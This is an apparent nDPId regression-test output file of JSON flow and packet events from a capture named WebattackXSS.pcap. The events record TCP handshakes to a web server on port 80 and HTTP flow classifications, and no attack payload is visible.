+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1499347062740,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347062740,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz+TKmKvobNa7baAScSCQ2AAAAgQFtAQCCAoD4xY2ATlEvwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1499347062741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347062741,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/9RAAD4GxgOsEAABwKgKMs\/kAFBs1rttypir6YAQAOUv3wAAAQEICgE5RMAD4xY2"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347065288,"flow_last_seen":1499347065288,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347065288,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1499347065288,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347065288,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8t0lAAD4GDoesEAABwKgKMs\/+AFBdePB1AAAAAKACchD4UQAAAgQFtAQCCAoBOUc8AAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1499347065288,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347065288,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz\/602CZHXXjwdqAScSABewAAAgQFtAQCCAoD4xizATlHPAEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1499347065288,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347065288,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0t0pAAD4GDo6sEAABwKgKMs\/+AFBdePB2tNgmSIAQAOWggQAAAQEICgE5Rz0D4xiz"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":854,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347066560,"flow_last_seen":1499347066560,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347066560,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":854,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1499347066560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347066560,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zkNAAD4G94ysEAABwKgKMtAMAFBP5YY5AAAAAKACchBu1QAAAgQFtAQCCAoBOUh6AAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1499347066560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347066560,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0Ax\/i5rPT+WGOqAScSA3hQAAAgQFtAQCCAoD4xnxATlIegEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":856,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1499347066560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347066560,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zkRAAD4G95OsEAABwKgKMtAMAFBP5YY6f4ua0IAQAOXWiwAAAQEICgE5SHsD4xnx"} +00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1499346935283,"flow_last_seen":1499346941359,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7240,"flow_tot_l4_payload_len":15748,"flow_avg_l4_payload_len":524,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935343,"flow_last_seen":1499346941289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52100,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935343,"flow_last_seen":1499346941289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52118,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52120,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52120,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347069146,"flow_last_seen":1499347069146,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347069146,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53286,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1499347069146,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347069146,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8xkJAAD4G\/42sEAABwKgKMtAmAFBk4I1DAAAAAKACchBQLwAAAgQFtAQCCAoBOUsBAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1499347069146,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347069146,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0CYp21tPZOCNRKAScSCriAAAAgQFtAQCCAoD4xx4ATlLAQEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":877,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1499347069147,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347069147,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0xkNAAD4G\/5SsEAABwKgKMtAmAFBk4I1EKdtbUIAQAOVKkAAAAQEICgE5SwED4xx4"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":884,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347070422,"flow_last_seen":1499347070422,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347070422,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":884,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1499347070422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347070422,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83flAAD4G59asEAABwKgKMtA0AFCnyZG5AAAAAKACchAHgwAAAgQFtAQCCAoBOUxAAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":885,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1499347070422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347070422,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0DQuPoKZp8mRuqAScSA18AAAAgQFtAQCCAoD4x23ATlMQAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1499347070423,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347070423,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03fpAAD4G592sEAABwKgKMtA0AFCnyZG6Lj6CmoAQAOXU9wAAAQEICgE5TEAD4x23"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":899,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347071685,"flow_last_seen":1499347071685,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347071685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1499347071685,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347071685,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gQZAAD4GRMqsEAABwKgKMtBCAFDUJMx6AAAAAKACchCfHAAAAgQFtAQCCAoBOU18AAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1499347071686,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347071686,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0EJ9MmhQ1CTMe6AScSCXogAAAgQFtAQCCAoD4x7zATlNfAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1499347071686,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347071686,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gQdAAD4GRNGsEAABwKgKMtBCAFDUJMx7fTJoUYAQAOU2qgAAAQEICgE5TXwD4x7z"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":914,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347074268,"flow_last_seen":1499347074268,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347074268,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":914,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1499347074268,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347074268,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NBxAAD4GkbSsEAABwKgKMtBcAFD4fmQdAAAAAKACchDggAAAAgQFtAQCCAoBOVABAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":915,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1499347074268,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347074268,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0Fw80cpV+H5kHqAScSC03QAAAgQFtAQCCAoD4yF4ATlQAQEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1499347074269,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347074269,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NB1AAD4GkbusEAABwKgKMtBcAFD4fmQePNHKVoAQAOVT5AAAAQEICgE5UAID4yF4"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":926,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347075596,"flow_last_seen":1499347075596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347075596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":926,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1499347075596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347075596,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8KAdAAD4GncmsEAABwKgKMtBqAFA4KXlJAAAAAKACchCKTwAAAgQFtAQCCAoBOVFOAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":927,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1499347075597,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347075597,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0GplJM47OCl5SqAScSAxJwAAAgQFtAQCCAoD4yLEATlRTgEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":928,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1499347075597,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347075597,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KAhAAD4GndCsEAABwKgKMtBqAFA4KXlKZSTOPIAQAOXQLgAAAQEICgE5UU4D4yLE"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347078168,"flow_last_seen":1499347078168,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347078168,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53380,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1499347078168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347078168,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VtlAAD4GbvesEAABwKgKMtCEAFCbYgUIAAAAAKACchCYugAAAgQFtAQCCAoBOVPRAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":948,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1499347078168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347078168,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0IRJPKyYm2IFCaAScSB6mgAAAgQFtAQCCAoD4yVHATlT0QEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":949,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1499347078169,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347078169,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VtpAAD4Gbv6sEAABwKgKMtCEAFCbYgUJSTysmYAQAOUZogAAAQEICgE5U9ED4yVH"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347079449,"flow_last_seen":1499347079449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347079449,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1499347079449,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347079449,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81tZAAD4G7vmsEAABwKgKMtCSAFDwQYPHAAAAAKACchDDzQAAAgQFtAQCCAoBOVURAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1499347079449,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347079449,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0JKY6hHr8EGDyKAScSDvawAAAgQFtAQCCAoD4yaIATlVEQEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":958,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1499347079450,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347079450,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01tdAAD4G7wCsEAABwKgKMtCSAFDwQYPImOoR7IAQAOWOcwAAAQEICgE5VRED4yaI"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":971,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347080793,"flow_last_seen":1499347080793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347080793,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53408,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":971,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1499347080793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347080793,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8x4ZAAD4G\/kmsEAABwKgKMtCgAFDV9pHnAAAAAKACchDOmgAAAgQFtAQCCAoBOVZhAAAAAAEDAwc="} 